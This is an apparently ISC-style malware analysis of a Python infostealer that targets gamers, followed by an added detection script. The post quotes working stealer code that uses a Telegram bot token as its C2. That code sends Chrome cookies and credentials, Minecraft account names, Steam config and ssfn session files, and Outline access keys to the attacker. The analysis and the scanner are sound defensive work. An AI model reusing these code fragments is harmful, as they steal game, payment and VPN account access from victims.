Python Infostealer Targeting Gamers
There are a lot of “gamers” on the Internet, and they generate a lot of business around games. Many games can be downloaded for free, but they have online shops selling options like extra lives, weapons, suits, packages, etc. The gaming business is therefore very lucrative today[1].
I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“????????? ??????” can be translated to "a new connection has been established”).
Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:
bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)
The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.
First, Chrome data is inspected, but only cookies and credentials for a list of interesting domains are collected:
target_domain = [ "minecraft.net", "google.com", "live.com", "apple.com", "twitter.com", "spotify.com", "discord.com", "discord.gg", "blockchain.com", "coinbase.com", "paypal.com", "mojang.com", "steamcommunity.com", "steampowered.com", "origin.com", "ea.com", "ubisoft.com" ]
Then, the script checks whether Minecraft is installed and, if so, reads the launcher's account file:
if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass
Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup (registry values, the config.vdf and loginusers.vdf files, and the ssfn session files found in the Steam directory):
try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
            steam_ssfn.append(filename)
    steam_installed = True
except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False
send_to_users = [1084445274]
for user in send_to_users:
    bot.send_message(user, f"????????? ?????? `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name: `{socket.gethostname()}`\n??User: `{os.getlogin()}`\n?OC: `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/(unknown)", "rb") as file:
                bot.send_document(user, file, caption=f"`(unknown)`", parse_mode="MARKDOWN")
            file.close()
The script also looks for an Outline Manager installation and extracts access keys from its log file:
if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
                reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
                key = reg.sub('', key)
                for user in send_to_users:
                    bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")
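As an added example (not part of the original diary or of the sample), here is a small static triage script that flags Python files combining the indicators seen above: a Telegram bot token, possibly hidden in a base64 literal as this sample does, plus the Steam, Minecraft and Outline artifacts. The script and token it scans are constructed for the example, not taken from the malware.

```python
import base64
import re

# Telegram bot token as passed to telebot.TeleBot(): numeric bot id, a colon, then a 35-char secret.
TELEGRAM_TOKEN_RE = re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b")
# Double-quoted string literals that look like base64 (the sample hides its token this way).
BASE64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')

# Artifacts the diary's sample touches; each alone is benign, together they describe a gamer stealer.
GAMER_ARTIFACTS = {
    "telegram_c2": re.compile(r"\btelebot\.TeleBot\("),
    "minecraft_accounts": re.compile(r"launcher_accounts_microsoft_store\.json"),
    "steam_registry": re.compile(r"winreg\.OpenKey\(.*HKEY_CURRENT_USER"),
    "steam_sessions": re.compile(r'"ssfn"|loginusers\.vdf|config\.vdf'),
    "outline_keys": re.compile(r'"accessKey"'),
    "send_document": re.compile(r"\.send_document\("),
}

def decoded_base64_literals(source):
    """Yield every base64 string literal in the source that decodes to printable ASCII."""
    for m in BASE64_LITERAL_RE.finditer(source):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            yield text

def scan_script(source):
    """Return (artifact names found, bot tokens found in clear text or inside base64 literals)."""
    hits = sorted(name for name, rx in GAMER_ARTIFACTS.items() if rx.search(source))
    candidates = [source] + list(decoded_base64_literals(source))
    tokens = sorted({t for c in candidates for t in TELEGRAM_TOKEN_RE.findall(c)})
    return hits, tokens

def verdict(hits, tokens):
    """Flag a script that has a Telegram C2 token plus at least two stealer artifacts."""
    return bool(tokens) and "telegram_c2" in hits and len(hits) >= 3

# Constructed sample, not the malware: a fake token, base64-encoded the way the sample does it.
SAMPLE_TOKEN = "1234567890:AAHconstructedSampleSecretValue1234"
SAMPLE_SCRIPT = f'''
bot = telebot.TeleBot(base64.b64decode("{base64.b64encode(SAMPLE_TOKEN.encode()).decode()}").decode("utf-8"), parse_mode=None)
steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
for filename in os.listdir(steampath):
    if "ssfn" in filename:
        bot.send_document(user, open(filename, "rb"), caption="steam_ssfn")
'''
```

Calling scan_script(SAMPLE_SCRIPT) returns the four matched artifact names and the decoded fake token, and verdict() flags the script; a file that only imports telebot is not flagged.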
Nothing brand new in this sample, except that it targets gamers. Money is involved in games (sometimes a lot), so gamers are attractive targets for attackers. Stay safe!
[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant